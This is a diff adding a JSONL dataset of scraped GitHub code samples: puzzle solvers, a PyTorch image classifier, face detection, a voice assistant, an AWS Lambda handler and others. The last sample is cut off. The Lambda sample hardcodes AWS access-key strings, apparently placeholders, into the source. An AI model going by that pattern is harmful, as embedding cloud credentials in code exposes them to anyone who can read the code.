diff --git "a/3552.jsonl" "b/3552.jsonl" new file mode 100644--- /dev/null +++ "b/3552.jsonl" @@ -0,0 +1,1173 @@ +{"seq_id":"9991298266","text":"from typing import Set\n\nfrom Day import Day\n\n\nclass Day8(Day):\n LEN_GUESS = {2: {1},\n 3: {7},\n 4: {4},\n 5: {2, 3, 5},\n 6: {0, 6, 9},\n 7: {8}}\n\n MATCH_NB = {'abcefg': 0, 'cf': 1, 'acdeg': 2, 'acdfg': 3, 'bcdf': 4, 'abdfg': 5, 'abdefg': 6,\n 'acf': 7, 'abcdefg': 8, 'abcdfg': 9}\n\n def __init__(self):\n super().__init__(8)\n self.patterns = None\n self.combinations = None\n self.combinations_nb = None\n self.guesses = None\n\n def build_data(self, input_data):\n self.patterns = []\n self.combinations = []\n self.guesses = []\n for line in input_data:\n line_split = line.split(' | ')\n self.patterns.append(line_split[0].split(' '))\n self.combinations.append((line_split[1].split(' ')))\n\n def count_easy_guesses(self, input_data):\n self.build_data(input_data)\n count = 0\n for c in self.combinations:\n for digit in c:\n if 1 < len(digit) < 5 or len(digit) == 7:\n count += 1\n return count\n\n @staticmethod\n def revert_combination(guess):\n mapping = {}\n one = four = seven = None\n all_char = {'a', 'b', 'c', 'd', 'e', 'f', 'g'}\n var_069 = set()\n for key in guess:\n if len(key) == 2:\n one = set([c for c in key])\n elif len(key) == 3:\n seven = set([c for c in key])\n elif len(key) == 4:\n four = set([c for c in key])\n elif len(key) == 6:\n var_069 = var_069.union(all_char.difference(key))\n revert_a = seven.difference(one).pop()\n revert_bd = four.difference(one)\n revert_c = var_069.intersection(one).pop()\n revert_d = revert_bd.intersection(var_069).pop()\n revert_b = revert_bd.difference({revert_d}).pop()\n revert_f = one.difference({revert_c}).pop()\n revert_e = var_069.difference({revert_c, revert_d}).pop()\n revert_g = all_char.difference({revert_a, revert_b, revert_c, revert_d, revert_e, revert_f}).pop()\n mapping[revert_a] = 'a'\n mapping[revert_b] = 'b'\n mapping[revert_c] = 'c'\n mapping[revert_d] = 'd'\n mapping[revert_e] = 'e'\n mapping[revert_f] = 'f'\n mapping[revert_g] = 'g'\n return mapping\n\n def find_combination(self, input_value):\n self.build_data(input_value)\n self.guesses = []\n self.combinations_nb = []\n for idx in range(len(self.patterns)):\n guess = {i: self.LEN_GUESS[len(i)] for i in self.patterns[idx]}\n mapping = self.revert_combination(guess)\n self.combinations_nb.append([])\n for i in range(len(self.combinations[idx])):\n tmp = []\n for j in range(len(self.combinations[idx][i])):\n tmp.append(mapping[self.combinations[idx][i][j]])\n tmp.sort()\n tmp_str = \"\"\n for letter in tmp:\n tmp_str += letter\n self.combinations_nb[-1].append(self.MATCH_NB[tmp_str])\n value = 0\n start = 1000\n for elt in self.combinations_nb[-1]:\n value += elt*start\n start = start // 10\n self.combinations_nb[-1] = value\n return sum(self.combinations_nb)\n\n def solution_first_star(self, input_value):\n return self.count_easy_guesses(input_value)\n\n def solution_second_star(self, input_value):\n return self.find_combination(input_value)\n","repo_name":"F4lc0nCt/AdventOfCode2021","sub_path":"Day8.py","file_name":"Day8.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6365560079","text":"import numpy as np\nimport pandas as pd\nimport cv2\nfrom PIL import Image\nimport json\n\nimport pandas.util.testing as tm\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision 
import datasets, transforms, models\n\n\nfrom collections import OrderedDict\nimport argparse\n\n\n# Function that loads a checkpoint and rebuilds the model\ndef load_checkpoint(filepath):\n checkpoint = torch.load(filepath, map_location=\"cpu\")\n if checkpoint['arch'] == 'vgg16':\n model = models.vgg16(pretrained=True)\n for param in model.parameters():\n param.requires_grad = False\n else:\n print(\"Architecture not recognized.\")\n model.class_to_idx = checkpoint['class_to_idx']\n \n classifier = nn.Sequential(OrderedDict([('fc1', nn.Linear(25088, 5000)),\n ('relu', nn.ReLU()),\n ('drop', nn.Dropout(p=0.5)),\n ('fc2', nn.Linear(5000, 102)),\n ('output', nn.LogSoftmax(dim=1))]))\n\n model.classifier = classifier\n model.load_state_dict(checkpoint['model_state_dict'])\n \n return model\n\n\ndef process_image(image_path):\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns an Numpy array\n '''\n \n # Process a PIL image for use in a PyTorch model\n pil_image = Image.open(image_path)\n \n # Resize\n if pil_image.size[0] > pil_image.size[1]:\n pil_image.thumbnail((5000, 256))\n else:\n pil_image.thumbnail((256, 5000))\n \n # Crop \n left_margin = (pil_image.width-224)/2\n bottom_margin = (pil_image.height-224)/2\n right_margin = left_margin + 224\n top_margin = bottom_margin + 224\n \n pil_image = pil_image.crop((left_margin, bottom_margin, right_margin, top_margin))\n \n # Normalize\n np_image = np.array(pil_image)/255\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n np_image = (np_image - mean) / std\n \n # PyTorch expects the color channel to be the first dimension but it's the third dimension in the PIL image and Numpy array\n # Color channel needs to be first; retain the order of the other two dimensions.\n np_image = np_image.transpose((2, 0, 1))\n \n return np_image\n\n\n\n### Class Prediction ###\n\n# Implement the code to predict the class from an image file\n\ndef predict(image_path, model, topk=5, gpu=\"cpu\"):\n ''' Predict the class (or classes) of an image using a trained deep learning model.\n '''\n model.to(gpu)\n \n image = process_image(image_path)\n \n # Convert image to PyTorch tensor first\n image = torch.from_numpy(image).type(torch.FloatTensor)\n \n # Returns a new tensor with a dimension of size one inserted at the specified position.\n image = image.unsqueeze(0)\n output = model.forward(image.to(gpu))\n probabilities = torch.exp(output)\n \n # Probabilities and the indices of those probabilities corresponding to the classes\n top_probabilities, top_indices = probabilities.topk(topk)\n \n # Convert to lists\n top_probabilities = top_probabilities.detach().type(torch.FloatTensor).numpy().tolist()[0] \n top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0] \n \n # Convert topk_indices to the actual class labels using class_to_idx\n # Invert the dictionary so you get a mapping from index to class.\n \n idx_to_class = {value: key for key, value in model.class_to_idx.items()}\n #print(idx_to_class)\n \n top_classes = [idx_to_class[index] for index in top_indices]\n \n return top_probabilities, top_classes\n \n\n\n\ndef main():\n print(\"this is main test code\")\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_path', type = str, default = 'images/flowers/test/15/image_06351.jpg', help=\"path for input data to predict\")\n parser.add_argument('--save_path', type=str, default = 'weights/checkpoint.pth', help=\"path for saving checkpoint\")\n 
parser.add_argument('--json_path', type = str, default = 'flower_to_name.json', help=\"path for json file which have classes\")\n\n parser.add_argument('--gpu', default=\"cpu\", help='disables CUDA training')\n\n\n args = parser.parse_args()\n\n\n device = torch.device(\"cpu\")\n\n with open(args.json_path, 'r') as f:\n flower_to_name = json.load(f)\n\n\n model = load_checkpoint(args.save_path)\n probs, classes = predict(args.input_path, model.to(device), 5, args.gpu) \n\n \"\"\"\n for i in range(len(classes)) : \n print(classes[i], \" : \", flower_to_name[classes[i]])\n \"\"\"\n\n print(\"flower : \", flower_to_name[classes[0]], \" / probability : \", probs[0])\n\n if probs[0] > 0.8 : \n result = open(\"prediction_result/result.txt\", \"w\")\n data = \"{} : {}\" .format(flower_to_name[classes[0]], probs[0])\n result.write(data)\n else : \n print(\"probability is too low\")\n\n \nif __name__=='__main__' : \n main()","repo_name":"auswls/pytorch-cpu","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23903184545","text":"# 백준 7569번\n# 틀림\n# 반례\n# 5 3 1\n# 0 0 0 0 0\n# 0 1 0 1 0\n# 0 0 0 0 0\n\nfrom collections import deque\n\ndef f(h, i, j):\n q = deque()\n\n q.append((h, i, j))\n visited[h][i][j] = 0\n\n while q:\n h, i, j = q.popleft()\n for k in range(4):\n ni = i + di[k]\n nj = j + dj[k]\n if 0 <= ni < N and 0 <= nj < M:\n if box[h][ni][nj] == '0' and visited[h][ni][nj] == -1:\n box[h][ni][nj] = '1'\n q.append((h, ni, nj))\n visited[h][ni][nj] = visited[h][i][j] + 1\n for l in range(2):\n nh = h + dh[l]\n if 0 <= nh < H:\n if box[nh][i][j] == '0' and visited[nh][i][j] == -1:\n box[nh][i][j] = '1'\n q.append((nh, i, j))\n visited[nh][i][j] = visited[h][i][j] + 1\n\n\ndh = [-1, 1]\ndi = [0, 1, 0, -1]\ndj = [1, 0, -1, 0]\n\nM, N, H = map(int, input().split())\n\nbox = [[list(input().split()) for i in range(N)] for h in range(H)]\n# print(box)\n\nvisited = [[[-1]*M for i in range(N)] for h in range(H)]\n# print(visited)\n\nfor h in range(H):\n for i in range(N):\n for j in range(M):\n if box[h][i][j] == '1' and visited[h][i][j] == -1:\n f(h, i, j)\n# print(box)\n# print(visited)\n\nresult = 0\nmaxV = 0\nfor h in range(H):\n for i in range(N):\n for j in range(M):\n if box[h][i][j] == '0':\n result = -1\n if visited[h][i][j] > maxV:\n maxV = visited[h][i][j]\n if result == -1:\n break\n if result == -1:\n break\n if result == -1:\n break\nif result == -1:\n print(result)\nelse:\n print(maxV)","repo_name":"GyuReeKim/PycharmProjects_2nd","sub_path":"200108/토마토.py","file_name":"토마토.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3565041502","text":"from config import *\nimport traceback\n\ndef get_all_tracks():\n\t\tcollection = db.collection(u'Tracks')\n\t\treturn list(map(lambda x: x.to_dict(), collection.stream()))\n\nfor track in get_all_tracks():\n\tprint()\n\tfor key,value in track.items():\n\t\tprint(key, \"-->\", value)\n","repo_name":"McTechie/iste-spotify-workshop","sub_path":"Day 2/Firebase/data_retrieval.py","file_name":"data_retrieval.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8444881825","text":"from typing import TypeAlias\n\nIMAGE_TYPES = (\n \"rgb\",\n \"gif\",\n \"pbm\",\n \"pgm\",\n \"ppm\",\n \"tiff\",\n \"rast\",\n 
\"xbm\",\n \"jpeg\",\n \"bmp\",\n \"png\",\n \"webp\",\n \"exr\",\n \"svg\",\n)\n\nCOMMANDS = {\n (\"help\", \"-h\"): \"help\",\n (\"change\", \"-c\"): \"change\",\n (\"delete\", \"-d\"): \"delete\",\n (\"metadata\", \"-m\"): \"metadata\",\n (\"metadata-detailed\", \"-md\"): \"metadata-detailed\",\n (\"save\", \"-s\"): \"save\",\n}\n\nNOT_IMAGE: TypeAlias = None\n","repo_name":"practicesavedtheworld/metadata_deleter","sub_path":"src/constants/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40508126838","text":"import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nimport wikipedia\nimport pyjokes\n\nlistener = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty(\"voices\")\nengine.setProperty(\"voice\", voices[1].id) # 0 is male 1 is female\n\ndef talk(command):\n engine.say(command)\n engine.runAndWait()\n\ndef main():\n try:\n with sr.Microphone() as source_audio:\n print(\"Listening...\")\n voice = listener.listen(source_audio)\n command = listener.recognize_google(voice)\n command = command.lower()\n if \"siri\" in command:\n command = command.replace(\"siri\", \"\")\n talk(command)\n print(command)\n elif \"play\" in command:\n command = command.replace(\"play\", \"playing\")\n pywhatkit.playonyt(command)\n\n elif \"time\" in command:\n current_time = datetime.datetime.now().strftime(\"%I:%M %p\")\n print(current_time)\n talk(\"the time is {}\".format(current_time))\n\n elif \"info\" in command:\n person = command[::1]\n print(person)\n info = wikipedia.summary(person, 1)\n talk(info)\n elif \"information\" in command:\n person = command[::1]\n print(person)\n info = wikipedia.summary(person, 5)\n talk(info)\n elif \"joke\" in command:\n talk(pyjokes.get_joke())\n\n else:\n talk(\"repeat...\")\n except:\n talk(\"Did not understand... 
try again..\")\n\n\ndef run_alexa():\n while True:\n main()\n\n\nrun_alexa()\n ","repo_name":"erfan231/alexa_clone","sub_path":"alexa.py","file_name":"alexa.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42830915018","text":"import fnmatch\nimport os\nimport wave\nimport logging\nimport random\nfrom contextlib import closing\nfrom opyrant.utils import Event, filter_files\n\nlogger = logging.getLogger(__name__)\n\n# TODO: Integrate this concept of \"event\" with the one in events.py\n\nclass Stimulus(Event):\n \"\"\"docstring for Stimulus\"\"\"\n def __init__(self, *args, **kwargs):\n super(Stimulus, self).__init__(*args, **kwargs)\n if self.label=='':\n self.label = 'stimulus'\n\n\nclass AuditoryStimulus(Stimulus):\n \"\"\"docstring for AuditoryStimulus\"\"\"\n def __init__(self, *args, **kwargs):\n super(AuditoryStimulus, self).__init__(*args, **kwargs)\n if self.label=='':\n self.label = 'auditory_stimulus'\n\n @classmethod\n def from_wav(cls, wavfile):\n\n logger.debug(\"Attempting to create stimulus object from %s\" % wavfile)\n with closing(wave.open(wavfile,'rb')) as wf:\n (nchannels, sampwidth, framerate, nframes, comptype, compname) = wf.getparams()\n\n duration = float(nframes)/sampwidth\n duration = duration * 2.0 / framerate\n stim = cls(time=0.0,\n duration=duration,\n name=wavfile,\n label='wav',\n description='',\n file_origin=wavfile,\n annotations={'nchannels': nchannels,\n 'sampwidth': sampwidth,\n 'framerate': framerate,\n 'nframes': nframes,\n 'comptype': comptype,\n 'compname': compname,\n }\n )\n return stim\n\n\nclass StimulusCondition(object):\n \"\"\" Class to represent a single stimulus condition for an operant\n conditioning experiment. The name parameter should be meaningful, as it will\n be stored with the trial data. The booleans \"is_rewarded\" and \"is_punished\"\n can be used to state if a stimulus should consequated according to the\n experiment's reinforcement schedule.\n\n Parameters\n ----------\n name: string\n Name of the stimulus condition used in data storage\n response: string, int, or bool\n The value of the desired response. Used to determine if the subject's\n response was correct. (e.g. \"left\", True)\n is_rewarded: bool\n Whether or not a correct response should be rewarded\n is_punished: bool\n Whether or not an incorrect response should be punished\n files: list\n A list of files to use for the condition. If files is omitted, the list\n will be discovered using the file_path, file_pattern, and recursive\n parameters.\n file_path: string\n Path to directory where stimuli are stored\n recursive: bool\n Whether or not to search file_path recursively\n file_pattern: string\n A glob pattern to filter files by\n replacement: bool\n Whether individual stimuli should be sampled with replacement\n shuffle: bool\n Whether the list of files should be shuffled before sampling.\n\n Attributes\n ----------\n name: string\n Name of the stimulus condition used in data storage\n response: string, int, or bool\n The value of the desired response. Used to determine if the subject's\n response was correct. (e.g. 
\"left\", True)\n is_rewarded: bool\n Whether or not a correct response should be rewarded\n is_punished: bool\n Whether or not an incorrect response should be punished\n files: list\n All of the matching files found\n replacement: bool\n Whether individual stimuli should be sampled with replacement\n shuffle: bool\n Whether the list of files should be shuffled before sampling.\n\n Methods\n -------\n get()\n\n Examples\n --------\n # Get \".wav\" files for a \"go\" condition of a \"Go-NoGo\" experiment\n condition = StimulusCondition(name=\"Go\",\n response=True,\n is_rewarded=True,\n is_punished=True,\n file_path=\"/path/to/stimulus_directory\",\n recursive=True,\n file_pattern=\"*.wav\",\n replacement=False)\n\n # Get a wavefile\n wavefile = condition.get()\n \"\"\"\n\n def __init__(self, name=\"\", response=None, is_rewarded=True,\n is_punished=True, files=None, file_path=\"\", recursive=False,\n file_pattern=\"*\", shuffle=True, replacement=False):\n\n # These should do something better than printing and returning\n if files is None:\n if len(file_path) == 0:\n raise IOError(\"No stimulus file_path provided!\")\n if not os.path.exists(file_path):\n raise IOError(\"Stimulus file_path does not exist! %s\" % file_path)\n\n self.name = name\n self.response = response\n self.is_rewarded = is_rewarded\n self.is_punished = is_punished\n self.shuffle = shuffle\n self.replacement = replacement\n\n if files is None:\n self.files = filter_files(file_path,\n file_pattern=file_pattern,\n recursive=recursive)\n else:\n self.files = files\n\n self._index_list = range(len(self.files))\n if self.shuffle:\n random.shuffle(self._index_list)\n\n logger.debug(\"Created new condition: %s\" % self)\n\n def __str__(self):\n\n return \"\".join([\"Condition %s: \" % self.name,\n \"# files = %d\" % len(self.files)])\n\n def get(self):\n \"\"\" Gets a single file from this condition's list of files. If\n replacement is True, choose a file randomly with replacement. If\n replacement is False, then return files in their (possibly shuffled)\n order.\n \"\"\"\n\n if len(self._index_list) == 0:\n self._index_list = range(len(self.files))\n if self.shuffle:\n random.shuffle(self._index_list)\n\n if self.replacement is True:\n index = random.choice(self._index_list)\n else:\n index = self._index_list.pop(0)\n\n logger.debug(\"Selected file %d of %d\" % (index + 1, len(self.files)))\n return self.files[index]\n\n\nclass StimulusConditionWav(StimulusCondition):\n \"\"\" Modifies StimulusCondition to only include .wav files. 
For usage\n information see StimulusCondition.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n super(StimulusConditionWav, self).__init__(file_pattern=\"*.wav\",\n *args, **kwargs)\n\n def get(self):\n \"\"\" Gets an AuditoryStimulus instance from a chosen .wav file \"\"\"\n wavfile = super(StimulusConditionWav, self).get()\n\n return AuditoryStimulus.from_wav(wavfile)\n","repo_name":"opyrant/opyrant","sub_path":"opyrant/stimuli.py","file_name":"stimuli.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"38576427153","text":"import cv2\nimport mediapipe as mp\nimport time\n#############\npTime = 0\ncTime = 0\n#############\n\ncap = cv2.VideoCapture(0)\n\nmpFaceDetection = mp.solutions.face_detection\nmpDraw = mp.solutions.drawing_utils\nfaceDetection = mpFaceDetection.FaceDetection(0.75)\n\nwhile True:\n success, img = cap.read()\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n results = faceDetection.process(imgRGB)\n # print(results)\n if results.detections:\n for id, detection in enumerate(results.detections):\n # mpDraw.draw_detection(img, detection)\n # print(id, detection)\n # print(detection.score)\n # print(detection.location_data.relative_bounding_box) #gives us xmin, ymin, width, height\n bound_box_c = detection.location_data.relative_bounding_box \n h,w,c = img.shape\n bound_box = int(bound_box_c.xmin*w), int(bound_box_c.ymin*h), int(bound_box_c.width*w), int(bound_box_c.height*h)\n cv2.rectangle(img, bound_box, (0,255,255), 2)\n cv2.putText(img, f'{int(detection.score[0]*100)}%', (bound_box[0],bound_box[1]-20), cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),1)\n\n\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime = cTime\n cv2.putText(img, 'fps: ' +str(int(fps)), (10,70), cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n cv2.imshow('Image', img)\n if cv2.waitKey(10) & 0xFF == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break","repo_name":"MallowATN/ml_projects","sub_path":"Computer Vision/FaceTracking/code/FaceDetect.py","file_name":"FaceDetect.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29254737877","text":"from util import run_emulator, read_task\n\n\ndef test_simple_example_requires_one_courier():\n result = run_emulator(read_task('example.json'))\n # 1 route is enough\n assert result['metrics']['courier_metrics']['delivery_count']['minimum'] == 0\n assert result['metrics']['delivery_metrics']['delivery_count_per_route']['count'] == 1\n assert result['metrics']['delivery_metrics']['delivery_duration']['maximum'] < 3600\n\n\ndef test_extra_weight_requires_two_couriers():\n task = read_task('example.json')\n task['couriers'][0]['capacity'] = {'weight_kg': 100}\n task['couriers'][1]['capacity'] = {'weight_kg': 1}\n task['orders'][0]['shipment_size'] = {'weight_kg': 0.5}\n task['orders'][1]['shipment_size'] = {'weight_kg': 50}\n task['orders'][2]['shipment_size'] = {'weight_kg': 50}\n result = run_emulator(task)\n # 2 routes are needed\n assert result['metrics']['courier_metrics']['delivery_count']['minimum'] == 1\n assert result['metrics']['delivery_metrics']['delivery_count_per_route']['count'] == 2\n\n\ndef test_time_window():\n task = read_task('example.json')\n task['orders'][-1]['time'] = {'type': 'window', 'value': {'start': 1640884528, 'end': 1640884828}}\n # It's important here, because system time (now) incrementation is first operation in emulator loop.\n 
task['options']['iteration_period'] = 60.0\n result = run_emulator(task)\n # 1 route is enough, but more time is needed\n assert result['metrics']['courier_metrics']['delivery_count']['minimum'] == 0\n assert result['metrics']['delivery_metrics']['delivery_count_per_route']['count'] == 1\n assert result['metrics']['delivery_metrics']['delivery_duration']['maximum'] > 500\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_constraints.py","file_name":"test_constraints.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39795613252","text":"# función con parametros(Calculadora)\ndef calculadora(a,b):\n \n division=a/b \n multiplicacion=a*b\n resta=a-b\n suma=a+b\n print(\"La suma es: \",suma)\n print(\"La resta es: \",resta)\n print(\"La multiplicación es: \",multiplicacion)\n print(\"La divición es: \",division)\n#App para calcular 2 números\nn=int(input(\"Digite el primer número: \"))\nd=int(input(\"Digite el segundo número: \"))\ncalculadora(n,d) # llamada a la función, la calculadora se muestra en la consola","repo_name":"josemoralesQ/josemoralesQ.github.io","sub_path":"pages/icons/Funciones/proyecto3x.py","file_name":"proyecto3x.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23600637723","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nimport array\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('FILE', nargs=1)\n\targs = parser.parse_args()\n\n\tif not os.path.exists(args.FILE[0]):\n\t\tprint(\"enter file for argument; not '%s'\" % args.DIR[0])\n\t\tquit(1)\n\n\theader = '''\\\n\n\n\n \n\n \n\n \n\n'''\n\tprint(header)\n\n\twith open(args.FILE[0], \"r\") as file:\n\t\tfor line in file:\n\t\t\t# fekin empty lines\n\t\t\tif (line.strip() == ''):\n\t\t\t\tcontinue\n\n\t\t\tsp=[w.strip() for w in line.split('\\t')]\n\t\t\tremote = sp[0].strip()\n\t\t\tname = sp[1].strip()\n\t\t\tprint('' % (name, remote))\n\n\tfooter = '''\\\n\n\\\n'''\n\tprint(footer)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"thewisenerd/android--mirror","sub_path":"scripts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30244819362","text":"import json\nimport boto3\nimport base64\n\nendpoint_name ='torchserve-endpoint-2021-06-06-21-56-06'\nsession = boto3.Session(aws_access_key_id='xxxxx', aws_secret_access_key='/dgdgdf gdgvdfg dfgdf +cK')\ns3 = session.client('s3')\nsage = session.client('runtime.sagemaker')\n \nbucket_name = 'uploaderr'\n\ndef lambda_handler(event, context):\n \n # Read the input image\n body = json.loads(event['body'])\n im_b64 = body['image']\n payload = base64.b64decode(im_b64.encode('utf-8'))\n \n # Pass the image to the model & wait for the results\n response = sage.invoke_endpoint(EndpointName=endpoint_name, \n ContentType='application/x-image', \n Body=payload)\n \n # Convert list of int to list of strings\n a = [str(t) for t in json.loads(response['Body'].read()) ]\n \n return {\n 'statusCode': 200,\n 'body': \" \".join(a)\n 
}\n\n\n","repo_name":"the-beee/Test-Deployment","sub_path":"Serverless/lambda_func.py","file_name":"lambda_func.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30918642680","text":"import warnings\n\nfrom .component import Component\n\n\ndef Rock(*args, **kwargs):\n \"\"\"\n Graceful deprecation for old class name.\n \"\"\"\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"always\")\n w = \"The 'Rock' class was renamed 'Component'. \"\n w += \"Please update your code.\"\n warnings.warn(w, DeprecationWarning, stacklevel=2)\n\n return Component(*args, **kwargs)\n","repo_name":"agilescientific/striplog","sub_path":"striplog/rock.py","file_name":"rock.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":194,"dataset":"github-code","pt":"3"} +{"seq_id":"19508087700","text":"import pickle\nimport argparse\nimport string\nimport re\n\ndef get_args():\n\tparser = argparse.ArgumentParser(description = 'Convert file in assignment2 format into Text Classification feature file')\n\tparser.add_argument(\"--rp\", type=str, required=True, help=\"Raw data file in Part 2 format\")\n\tparser.add_argument(\"--fp\", type=str, required=True, help=\"Path to save feature file\")\n\targs = parser.parse_args()\n\treturn args\n\nargs = get_args()\n\n\ndatafilepath = args.rp\nsavepath = args.fp\n\n\n\n#Clean out label of sentence tool\n\ndef labelcleaner(sentence):\n\tdeletecnt = 0\n\tfor each_str in sentence:\n\t\t\n\t\tif each_str not in string.whitespace:\n\t\t\tdeletecnt += 1\n\t\telse:\t\t\t\n\t\t\tsentence = sentence[deletecnt:]\n\t\t\treturn sentence\n\n#Counting tool\ncount = lambda l1,l2: len(list(filter(lambda c: c in l2,l1)))\n\n#Split without any puncuation\ndef CleanSplitter(sentence):\n\tsentence = ''.join(c for c in sentence if c not in string.punctuation)\n\tsentence = sentence.split()\n\treturn sentence\n\ndef findLABEL(sentence):\n\tlabel = CleanSplitter(sentence)[0]\n\treturn label\n\n\n\n\n#Feature extractors\n\ndef WORDcnt(sentence):\n\tnum = len(CleanSplitter(sentence))\n\treturn num\n\ndef WHITEcnt(sentence):\n\tnum = count(sentence,string.whitespace)\n\treturn num\n\ndef PUNCcnt(sentence):\n\tnum = count(sentence,string.punctuation)\n\treturn num\n\ndef NUMcnt(sentence):\n\tnum = count(sentence,string.digits)\n\treturn num\n\ndef leadingspace(sentence):\n\tsentence = labelcleaner(sentence)\n\tnum = len(sentence) - len(sentence.lstrip())\n\treturn num\n\ndef LETTERcnt(sentence):\n\tnum = count(sentence,string.ascii_letters)\n\treturn num\n\ndef UPPERcnt(sentence):\n\tnum = count(sentence,string.ascii_uppercase)\n\treturn num\n\ndef EMAILMARKcnt(sentence):\n\tnum = count(sentence,'@')\n\treturn num\n\t\ndef INDENTcnt(sentence):\n\tnum = count(sentence,'\\t') \n\n\treturn num\n\ndef QUOTATIONcnt(sentence):\n\tnum = count(sentence,':')\n\n\treturn num\n\ndef firstPUNCsignpos(sentence):\n\tcnt = 0\n\tquotpos = 0\n\twhile cnt < len(sentence):\n\t\tif sentence[cnt] in string.punctuation:\n\t\t\tquotpos = cnt\n\t\t\treturn quotpos\n\t\tcnt += 1\n\treturn quotpos\n\n\n\n\n\n#Open up file and put everything into a list of strings\ntry:\n\tdata = open(datafilepath)\n\n\tlines = [] #Text themselfs\n\tLabelnames = [] #Unique label names\n\tTempclass = []\n\n\ttry:\n\t\tcnt = 0\n\t\tfor each_line in data:\t\n\t\t\t#Skip feature extracting for #BLANK# lines\n\t\t\t#if findLABEL(each_line) == 
'BLANK':\n\t\t\t\t#continue\n\n\t\t\tlines.append(each_line)\t\n\t\t\t#Convert Label \n\n\t\t\tTempclass.append(findLABEL(lines[cnt]))\n\n\t\t\tcnt += 1\n\n\t\t#Set Unique Label classes\n\t\t#Labelnames = list(set(Tempclass))\n\texcept ValueError:\n\t\t\tpass\nexcept IOError as err:\n\tprint('File error:' + str(err))\n\texit()\n\n#################################################\n# Feature extraction rules:\t\t\t#\n#\tNum of words\t\t\t\t#\n#\tNum of whitespaces\t\t\t#\n#\tNum of punctuations\t\t\t#\n#\tNum of numbers\t\t\t\t#\n#\tNum of leadingspaces\t\t\t#\n#\tNum of letters\t\t\t\t#\n#\tNum of UPPERletters\t\t\t#\n#\tNum of EMAILMARKs\t\t\t#\n#\tNum of INDENTations\t\t\t#\n#\tNum of QUOTATIONs\t\t\t#\n#\tPosition of 1st QUOTATIONs\t\t#\n#################################################\n\ncleanlines = []\n\n\n#Make sure cleanlines only have lines without any label in front\ncnt = 0\nwhile cnt < len(lines):\n\tif CleanSplitter(lines[cnt])[0] in Labelnames:\n\t\tcleanlines.append(labelcleaner(lines[cnt]))\n\telse:\n\t\tcleanlines.append(lines[cnt])\n\tcnt += 1\n\n\n\n\n\nnumWords = []\nnumWhtspc = []\nnumPunc = []\nnumNum = []\nnumLdspc = []\nnumLetter = []\nnumUpper = []\nnumEmlMk = []\nnumIndent = []\nposPunc = []\n\nfor each_line in cleanlines:\n\tnumWords.append(WORDcnt(each_line))\n\tnumWhtspc.append(WHITEcnt(each_line))\n\tnumPunc.append(PUNCcnt(each_line))\n\tnumNum.append(NUMcnt(each_line))\n\tnumLdspc.append(leadingspace(each_line))\n\tnumLetter.append(LETTERcnt(each_line))\n\tnumUpper.append(UPPERcnt(each_line))\n\tnumEmlMk.append(EMAILMARKcnt(each_line))\n\tnumIndent.append(INDENTcnt(each_line))\n\tposPunc.append(firstPUNCsignpos(each_line))\n\n\n\n\n#Initializing Features with label, then append each converted features\nFeatures = []\ncnt = 0\n\n\n\nwhile cnt np.ndarray:\r\n img = Image.open(filename).convert(\"RGB\")\r\n arr = np.array(img)\r\n return arr\r\n\r\n\r\ndef save_image_from_numpy_array(filename: str, image_array: np.ndarray, quality: int=100):\r\n img = Image.fromarray(image_array)\r\n img.save(filename, \"JPEG\", quality=quality) # , optimize=True, progressive=True)\r\n\r\n\r\ndef show_image_from_numpy_array(image_array: np.ndarray, header: str = \"\", axis: bool = False):\r\n fig, ax = plt.subplots()\r\n ax.set_title(header)\r\n ax.imshow(image_array)\r\n\r\n if not axis:\r\n plt.axis(\"off\")\r\n\r\n plt.show()\r\n\r\n\r\ndef 